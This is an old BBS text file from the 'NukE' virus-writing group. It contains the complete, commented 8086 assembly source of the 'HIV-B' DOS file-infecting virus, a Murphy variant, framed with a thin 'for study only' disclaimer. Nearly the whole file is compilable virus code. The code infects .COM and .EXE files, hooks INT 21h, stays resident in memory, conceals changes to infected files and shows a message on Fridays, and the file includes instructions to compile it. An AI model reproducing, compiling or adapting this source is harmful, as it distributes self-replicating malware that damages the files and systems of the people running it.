;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ; ; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp: Peter Venkman [=- ; ; -=] [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=][][][][][][][][][][][][][][][=- ; ; ; ; *** NOT FOR GENERAL DISTRIBUTION *** ; ; ; ; This File is for the Purpose of Virus Study Only! It Should not be Passed ; ; Around Among the General Public. It Will be Very Useful for Learning how ; ; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; ; Experience can Turn it Into a far More Malevolent Program Than it Already ; ; Is. Keep This Code in Responsible Hands! ; ; ; ;****************************************************************************; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> HIV Virus Source : HIV - VIRUS Created: March 1991 Scan ID: [Murphy] Origin: Italy ,"Italain Virus Laboratory!" Sources: Produced by Rock Steady [NukE] [NukE] Notes: Okay, another VIRUS SOURCE Release from [NukE]! Yup, ~~~~~~~~~~~~~ Anywayz, this Virus cums from the Murphy Virus! So if you Scan it with SCAN McAfee & Ass. you will see that it will be detected as the [Murphy] Virus! I got this Virus from Italy from the "Italian Virus Laboratory!" Mind you this Virus Source is being released to the public because it's an OLD Virus and is detectable! and doesn't do any damage to the system! This virus was edited by me, I removed some bugs inside and produced this SOURCE CODE ONLY! [NOTE] Of course, this virus is ONLY for STUDYING, to learn on how virus are made! After the viruses are old its NICE to release them so people can study em! HOW THE HIV - VIRUS WORKS First, I'd like to thanx all those that thanked me for my latest Virus! (ParaSite Virus)! And I'm glad to say I'll be releasing the Source Codes to this virus in 6 MONTHS! Hopefully, by that time it will be Detected by SCAN (McAfee & Ass) and yall will get a chance to study this Assome Virus made totally from me... HIV -: This virus Spreads thru coping itself to .EXE and .COM Files! ~~~~~~ You will notice the file gets larger by 1614 Bytes! The Virus Hooks itself to Interrup 21h and totally system memory will be 1632 Bytes Less. Once the file is resident in Memory it will attach itself to every file that is runned or opened! The date of the original file Doesn't not change! All this virus does is Copy itself over and over again! CleanUp V77+ will get rid of it...or Simple delete all files Infected with the virus...Anywayz Enjoy... NOTE: If you want to compile the source, simply look for it in the .TXT files contained in DATA.EXE in this newsletter package. DATA_1E EQU 4CH ; Just a Few Data Segments that are DATA_3E EQU 84H ; Needed for the virus to find some DATA_5E EQU 90H ; hard core info... DATA_7E EQU 102H DATA_8E EQU 106H DATA_9E EQU 122H DATA_10E EQU 124H DATA_11E EQU 15AH DATA_12E EQU 450H DATA_13E EQU 462H DATA_14E EQU 47BH DATA_15E EQU 0 DATA_16E EQU 1 DATA_17E EQU 2 DATA_18E EQU 6 DATA_42E EQU 0FB2CH DATA_43E EQU 0FB2EH DATA_44E EQU 0FB4BH DATA_45E EQU 0FB4DH DATA_46E EQU 0FB83H DATA_47E EQU 0FB8DH DATA_48E EQU 0FB8FH DATA_49E EQU 0FB95H DATA_50E EQU 0FB97H DATA_51E EQU 0 DATA_52E EQU 2 SEG_A SEGMENT BYTE PUBLIC ASSUME CS:SEG_A, DS:SEG_A ORG 100h ; Compile this to a .COM file! ; So the Virus starts at 0100h HIV PROC FAR START: JMP LOC_35 DB 0C3H DB 23 DUP (0C3H) DB 61H, 6EH, 74H, 69H, 64H, 65H DB 62H, 0C3H, 0C3H, 0C3H, 0C3H DB 'HIV-B Virus - Release 1.1 [NukE]' DB ' ' copyright DB '(C) Edited by Rock Steady [NukE]' DB 0, 0 DATA_24 DW 0 DATA_25 DW 0 DATA_26 DW 0 DATA_27 DW 706AH DATA_28 DD 00000H DATA_29 DW 0 DATA_30 DW 706AH DATA_31 DD 00000H DATA_32 DW 0 DATA_33 DW 706AH DATA_34 DB 'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH DB 'Edited by Rock Steady [NukE]', 0AH, 0DH DB '(C) 1991 Italian Virus Laboratory', 0AH, 0DH DB '$' DB 0E8H, 83H, 3, 3DH, 4DH, 4BH DB 75H, 9, 55H, 8BH, 0ECH, 83H DB 66H, 6, 0FEH, 5DH, 0CFH, 80H DB 0FCH, 4BH, 74H, 12H, 3DH, 0 DB 3DH, 74H, 0DH, 3DH, 0, 6CH DB 75H, 5, 80H, 0FBH, 0, 74H DB 3 LOC_1: JMP LOC_13 LOC_2: PUSH ES ; Save All Regesters so that when PUSH DS ; we restore the program it will PUSH DI ; RUN correctly and hide the fact PUSH SI ; that any Virii is tampering with PUSH BP ; the System.... PUSH DX PUSH CX PUSH BX PUSH AX CALL SUB_6 CALL SUB_7 CMP AX,6C00H JNE LOC_3 ; Jump if not equal MOV DX,SI LOC_3: MOV CX,80H MOV SI,DX LOCLOOP_4: INC SI ; Slowly down the System a MOV AL,[SI] ; little. OR AL,AL ; Zero ? LOOPNZ LOCLOOP_4 ; Loop if zf=0, cx>0 SUB SI,2 CMP WORD PTR [SI],4D4FH JE LOC_7 ; Jump if equal CMP WORD PTR [SI],4558H JE LOC_6 ; Jump if equal LOC_5: JMP SHORT LOC_12 ; DB 90H LOC_6: CMP WORD PTR [SI-2],452EH JE LOC_8 ; Jump if equal JMP SHORT LOC_5 ; LOC_7: NOP CMP WORD PTR [SI-2],432EH JNE LOC_5 ; Jump if not equal LOC_8: MOV AX,3D02H CALL SUB_5 JC LOC_12 ; Jump if carry Set MOV BX,AX MOV AX,5700H CALL SUB_5 ; Initsilize the virus... MOV CS:DATA_24,CX ; A Basic Start up to check MOV CS:DATA_25,DX ; The Interrup 21h MOV AX,4200H XOR CX,CX XOR DX,DX CALL SUB_5 PUSH CS POP DS MOV DX,103H MOV SI,DX MOV CX,18H MOV AH,3FH CALL SUB_5 JC LOC_10 ; Jump if carry Set CMP WORD PTR [SI],5A4DH JNE LOC_9 ; Jump if not equal CALL SUB_1 JMP SHORT LOC_10 LOC_9: CALL SUB_4 LOC_10: JC LOC_11 ; Jump if carry Set MOV AX,5701H MOV CX,CS:DATA_24 MOV DX,CS:DATA_25 CALL SUB_5 LOC_11: MOV AH,3EH ; '>' CALL SUB_5 LOC_12: CALL SUB_7 POP AX ; A Stealth Procedure to POP BX ; end the virus and restore POP CX ; the program! Pup back all POP DX ; regesters as we found them! POP BP ; so nothings changed... POP SI POP DI POP DS POP ES LOC_13: JMP CS:DATA_28 DB 0B4H, 2AH, 0CDH, 21H, 0C3H HIV ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_1 PROC NEAR ; Start of the Virus! MOV AH,2AH ; Get the Date system Date! INT 21H ; If its Friday Display the ; message at Data34 and End! CMP AL,6 JE LOC_15 ; If Friday display message JNZ LOC_14 ; If not continue infecting LOC_14: ; and screwing the system! MOV CX,[SI+16H] ADD CX,[SI+8] MOV AX,10H MUL CX ; dx:ax = reg * ax ADD AX,[SI+14H] ADC DX,0 PUSH DX PUSH AX MOV AX,4202H XOR CX,CX ; Zero register XOR DX,DX ; Zero register CALL SUB_5 CMP DX,0 JNE LOC_16 ; Jump if not equal CMP AX,64EH JAE LOC_16 ; Jump if above or = POP AX POP DX STC ; Set carry flag RETN LOC_15: MOV DX,OFFSET DATA_34+18H ; Display Message at Data34! MOV AH,9 ; With New Offset Address in INT 21H ; memory! ; POP AX ; Restore all Regesters as if POP BX ; nothing was changed and exit POP CX ; virus and run File... POP DX POP SI POP DI POP BP POP DS POP ES MOV AH,0 ; Exit Virus if your in a .EXE INT 21H ; File!!! ; Exit virus if your in a .COM INT 20H ; File!!! LOC_16: MOV DI,AX MOV BP,DX POP CX SUB AX,CX POP CX SBB DX,CX CMP WORD PTR [SI+0CH],0 JE LOC_RET_19 ; Jump if equal CMP DX,0 JNE LOC_17 ; Jump if not equal CMP AX,64EH JNE LOC_17 ; Jump if not equal STC ; Set carry flag RETN LOC_17: MOV DX,BP MOV AX,DI PUSH DX PUSH AX ADD AX,64EH ADC DX,0 MOV CX,200H DIV CX ; Find out How much System LES DI,DWORD PTR [SI+2] ; memory is available... MOV CS:DATA_26,DI ; MOV CS:DATA_27,ES ; Every so often make the MOV [SI+2],DX ; system memory small than CMP DX,0 ; what it already is... JE LOC_18 ; Screws up the users hehe INC AX LOC_18: MOV [SI+4],AX POP AX POP DX CALL SUB_2 SUB AX,[SI+8] LES DI,DWORD PTR [SI+14H] MOV DS:DATA_9E,DI MOV DS:DATA_10E,ES MOV [SI+14H],DX ; Tie up some memory! MOV [SI+16H],AX ; release it on next execution MOV DS:DATA_11E,AX ; Jump to su routine to do MOV AX,4202H ; this and disable interrups XOR CX,CX XOR DX,DX CALL SUB_5 CALL SUB_3 JC LOC_RET_19 MOV AX,4200H XOR CX,CX ; Zero register XOR DX,DX ; Zero register CALL SUB_5 MOV AH,40H MOV DX,SI MOV CX,18H CALL SUB_5 LOC_RET_19: RETN SUB_1 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_2 PROC NEAR MOV CX,4 MOV DI,AX AND DI,0FH LOCLOOP_20: SHR DX,1 ; Shift w/zeros fill RCR AX,1 ; Rotate thru carry LOOP LOCLOOP_20 ; Loop if cx > 0 MOV DX,DI RETN SUB_2 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_3 PROC NEAR MOV AH,40H MOV CX,64EH MOV DX,100H CALL SUB_6 JMP SHORT LOC_24 DB 90H ;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_4: MOV AX,4202H XOR CX,CX ; Zero register XOR DX,DX ; Zero register CALL SUB_5 CMP AX,64EH JB LOC_RET_23 ; Jump if below CMP AX,0FA00H JAE LOC_RET_23 ; Jump if above or = PUSH AX CMP BYTE PTR [SI],0E9H JNE LOC_21 ; Jump if not equal SUB AX,651H CMP AX,[SI+1] JNE LOC_21 ; Jump if not equal POP AX STC ; Set carry flag RETN LOC_21: CALL SUB_3 JNC LOC_22 ; Jump if carry=0 POP AX RETN LOC_22: MOV AX,4200H XOR CX,CX ; Zero register XOR DX,DX ; Zero register CALL SUB_5 POP AX SUB AX,3 MOV DX,122H MOV SI,DX MOV BYTE PTR CS:[SI],0E9H MOV CS:[SI+1],AX MOV AH,40H MOV CX,3 CALL SUB_5 LOC_RET_23: RETN SUB_3 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_5 PROC NEAR LOC_24: PUSHF ; Push flags CALL CS:DATA_28 RETN SUB_5 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_6 PROC NEAR PUSH AX PUSH DS PUSH ES XOR AX,AX ; Zero register PUSH AX POP DS CLI ; Disable the interrupts LES AX,DWORD PTR DS:DATA_5E ; This Copies the Virus MOV CS:DATA_29,AX ; to the COM File... MOV CS:DATA_30,ES MOV AX,46AH MOV DS:DATA_5E,AX MOV WORD PTR DS:DATA_5E+2,CS LES AX,DWORD PTR DS:DATA_1E ; Loads 32Bit word.. MOV CS:DATA_32,AX ; get your info needed on MOV CS:DATA_33,ES ; System... LES AX,CS:DATA_31 MOV DS:DATA_1E,AX MOV WORD PTR DS:DATA_1E+2,ES STI ; Enable the interrupts POP ES ; and restore regesters! POP DS ; go back to the file POP AX ; being executed... RETN SUB_6 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_7 PROC NEAR PUSH AX PUSH DS PUSH ES XOR AX,AX ; Zero register PUSH AX POP DS CLI ; Disable interrupts LES AX,DWORD PTR CS:DATA_29 ; same as Sub_6 just copy MOV DS:DATA_5E,AX ; yourself to the EXE MOV WORD PTR DS:DATA_5E+2,ES LES AX,DWORD PTR CS:DATA_32 MOV DS:DATA_1E,AX MOV WORD PTR DS:DATA_1E+2,ES STI ; Enable interrupts POP ES POP DS POP AX RETN SUB_7 ENDP DB 0B0H, 3, 0CFH, 50H, 53H, 51H DB 52H, 56H, 57H, 55H, 1EH, 6 DB 33H, 0C0H, 50H, 1FH, 8AH, 3EH DB 62H, 4, 0A1H, 50H, 4, 2EH DB 0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H DB 4, 0A3H, 50H, 4, 2EH, 0A1H DB 0C5H, 4, 8AH, 0DCH, 0B4H, 9 DB 0B9H, 1, 0, 0CDH, 10H, 0E8H DB 34H, 0, 0E8H, 0B7H, 0, 2EH DB 0A1H, 0C7H, 4, 0A3H, 50H, 4 DB 0B3H, 2, 0B8H, 2, 9, 0B9H DB 1, 0, 0CDH, 10H, 2EH, 0A1H DB 0CEH, 4, 0A3H, 50H, 4, 7 DB 1FH DB ']_^ZY[X.' DB 0FFH, 2EH, 0CAH, 4 DATA_36 DW 0 DATA_37 DW 1010H DATA_39 DB 0 DATA_40 DD 706A0000H DB 0, 0, 2EH, 0A1H, 0C7H, 4 DB 8BH, 1EH, 4AH, 4, 4BH, 2EH DB 0F6H, 6, 0C9H, 4, 1, 74H DB 0CH, 3AH, 0C3H, 72H, 12H, 2EH DB 80H, 36H, 0C9H, 4, 1, 0EBH DB 0AH LOC_25: CMP AL,0 JG LOC_26 ; Jump if > XOR CS:DATA_39,1 LOC_26: TEST CS:DATA_39,2 JZ LOC_27 ; Jump if zero CMP AH,18H JB LOC_28 ; Jump if below XOR CS:DATA_39,2 JMP SHORT LOC_28 LOC_27: CMP AH,0 JG LOC_28 ; Jump if > XOR CS:DATA_39,2 LOC_28: CMP BYTE PTR CS:DATA_36,20H JE LOC_29 ; Jump if equal CMP BYTE PTR CS:DATA_37+1,0 JE LOC_29 ; Jump if equal XOR CS:DATA_39,2 LOC_29: TEST CS:DATA_39,1 JZ LOC_30 ; Jump if zero INC BYTE PTR CS:DATA_37 JMP SHORT LOC_31 LOC_30: DEC BYTE PTR CS:DATA_37 ; (706A:04C7=10H) LOC_31: TEST CS:DATA_39,2 ; (706A:04C9=0) JZ LOC_32 ; Jump if zero INC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H) JMP SHORT LOC_RET_33 ; (0555) LOC_32: DEC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H) LOC_RET_33: RETN ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_8 PROC NEAR MOV AX,CS:DATA_37 MOV DS:DATA_12E,AX ; Get info on type of Video MOV BH,DS:DATA_13E ; Display the system has... MOV AH,8 INT 10H ; with ah=functn 08h ; basically fuck the cursur.. MOV CS:DATA_36,AX RETN SUB_8 ENDP DB 50H, 53H, 51H, 52H, 56H, 57H DB 55H, 1EH, 6, 33H, 0C0H, 50H DB 1FH, 81H, 3EH, 70H, 0, 6DH DB 4, 74H, 35H, 0A1H, 6CH, 4 DB 8BH, 16H, 6EH, 4, 0B9H, 0FFH DB 0FFH, 0F7H, 0F1H, 3DH, 10H, 0 DB 75H, 24H, 0FAH, 8BH, 2EH, 50H DB 4, 0E8H, 0BEH, 0FFH, 89H, 2EH DB 50H, 4, 0C4H, 6, 70H, 0 DB 2EH, 0A3H, 0CAH, 4, 2EH, 8CH DB 6, 0CCH, 4, 0C7H, 6, 70H DB 0, 6DH, 4, 8CH, 0EH, 72H DB 0, 0FBH LOC_34: POP ES POP DS ; Restore and get lost... POP BP POP DI POP SI POP DX POP CX POP BX POP AX RETN ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_9 PROC NEAR MOV DX,10H MUL DX ; dx:ax = reg * ax RETN SUB_9 ENDP ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_10 PROC NEAR XOR AX,AX ; If if wants to dissamble XOR BX,BX ; us give him a HARD time... XOR CX,CX ; By making all into 0 XOR DX,DX ; Zero register XOR SI,SI ; Zero register XOR DI,DI ; Zero register XOR BP,BP ; Zero register RETN SUB_10 ENDP LOC_35: PUSH DS CALL SUB_11 ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* ;*- SUBROUTINE *- ;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* SUB_11 PROC NEAR MOV AX,4B4DH INT 21H ; Load and EXEC file... ; be runned... NOP JC LOC_36 ; Jump if carry Set JMP LOC_46 LOC_36: POP SI PUSH SI MOV DI,SI XOR AX,AX ; Zero register PUSH AX POP DS LES AX,DWORD PTR DS:DATA_1E ; Load 32 bit ptr MOV CS:DATA_49E[SI],AX ; Move lots of data MOV CS:DATA_50E[SI],ES ; into CS to infect the file LES BX,DWORD PTR DS:DATA_3E ; if not infected and shit.. MOV CS:DATA_47E[DI],BX MOV CS:DATA_48E[DI],ES MOV AX,DS:DATA_7E CMP AX,0F000H JNE LOC_44 ; Jump if not equal MOV DL,80H MOV AX,DS:DATA_8E CMP AX,0F000H JE LOC_37 ; Jump if equal CMP AH,0C8H JB LOC_44 ; Jump if below CMP AH,0F4H JAE LOC_44 ; Jump if above or = TEST AL,7FH JNZ LOC_44 ; Jump if not zero MOV DS,AX CMP WORD PTR DS:DATA_51E,0AA55H JNE LOC_44 ; Jump if not equal MOV DL,DS:DATA_52E LOC_37: MOV DS,AX XOR DH,DH ; Zero register MOV CL,9 SHL DX,CL ; Shift w/zeros fill MOV CX,DX XOR SI,SI ; Zero register LOCLOOP_38: LODSW ; String [si] to ax CMP AX,0FA80H JNE LOC_39 ; Jump if not equal LODSW ; String [si] to ax CMP AX,7380H JE LOC_40 ; Jump if equal JNZ LOC_41 ; Jump if not zero LOC_39: CMP AX,0C2F6H JNE LOC_42 ; Jump if not equal LODSW ; String [si] to ax CMP AX,7580H JNE LOC_41 ; Jump if not equal LOC_40: INC SI LODSW ; String [si] to ax CMP AX,40CDH JE LOC_43 ; Jump if equal SUB SI,3 LOC_41: DEC SI DEC SI LOC_42: DEC SI LOOP LOCLOOP_38 ; Loop if cx > 0 JMP SHORT LOC_44 LOC_43: SUB SI,7 MOV CS:DATA_49E[DI],SI MOV CS:DATA_50E[DI],DS LOC_44: MOV AH,62H INT 21H ; Simple...Get the PSP ; Address (Program segment MOV ES,BX ; address and but in BX) MOV AH,49H INT 21H ; Get the Free memory from ; the system MOV BX,0FFFFH ; release extra memory blocks MOV AH,48H INT 21H ; Allocate the memory ; At BX (# bytes) SUB BX,66H ; it attaches virus right NOP ; under the 640k JC LOC_46 MOV CX,ES ; did it work? If not just STC ; end the virus... ADC CX,BX MOV AH,4AH INT 21H ; Adjust teh memory block ; size! BX has the # of bytes MOV BX,65H STC ; Set carry flag SBB ES:DATA_17E,BX ; Where to attach itself! PUSH ES ; under 640K MOV ES,CX MOV AH,4AH INT 21H ; Just change the memory ; allocations! (BX=Btyes Size) MOV AX,ES DEC AX MOV DS,AX MOV WORD PTR DS:DATA_16E,8 ;Same place under 640k CALL SUB_9 MOV BX,AX MOV CX,DX POP DS MOV AX,DS CALL SUB_9 ADD AX,DS:DATA_18E ADC DX,0 SUB AX,BX SBB DX,CX JC LOC_45 ; Jump if carry Set SUB DS:DATA_18E,AX LOC_45: MOV SI,DI XOR DI,DI ; Zero register PUSH CS POP DS SUB SI,4D7H MOV CX,64EH INC CX REP MOVSB ; Rep when cx >0 Mov [si] to MOV AH,62H ; es:[di] INT 21H ; Get the Program segment ; prefix...so we can infect it DEC BX MOV DS,BX MOV BYTE PTR DS:DATA_15E,5AH MOV DX,1E4H XOR AX,AX ; Zero register PUSH AX POP DS MOV AX,ES SUB AX,10H MOV ES,AX CLI ; Disable interrupts MOV DS:DATA_3E,DX ; MOV WORD PTR DS:DATA_3E+2,ES STI ; Enable interrupts DEC BYTE PTR DS:DATA_14E ; LOC_46: POP SI CMP WORD PTR CS:DATA_42E[SI],5A4DH JNE LOC_47 ; Jump if not equal POP DS MOV AX,CS:DATA_46E[SI] MOV BX,CS:DATA_45E[SI] ; all this shit is to restore PUSH CS ; the program and continue POP CX ; running the original SUB CX,AX ; program... ADD CX,BX PUSH CX PUSH WORD PTR CS:DATA_44E[SI] PUSH DS POP ES CALL SUB_10 RETF LOC_47: POP AX MOV AX,CS:DATA_42E[SI] MOV WORD PTR CS:[100H],AX MOV AX,CS:DATA_43E[SI] MOV WORD PTR CS:[102H],AX MOV AX,100H PUSH AX PUSH CS POP DS PUSH DS POP ES CALL SUB_10 RETN SUB_11 ENDP SEG_A ENDS END START Rock Steady [NuKE] ;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ; ; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp: Peter Venkman [=- ; ; -=] [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=][][][][][][][][][][][][][][][=- ; ; ; ; *** NOT FOR GENERAL DISTRIBUTION *** ; ; ; ; This File is for the Purpose of Virus Study Only! It Should not be Passed ; ; Around Among the General Public. It Will be Very Useful for Learning how ; ; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; ; Experience can Turn it Into a far More Malevolent Program Than it Already ; ; Is. Keep This Code in Responsible Hands! ; ; ; ;****************************************************************************; ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ; ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ; ;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ; ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;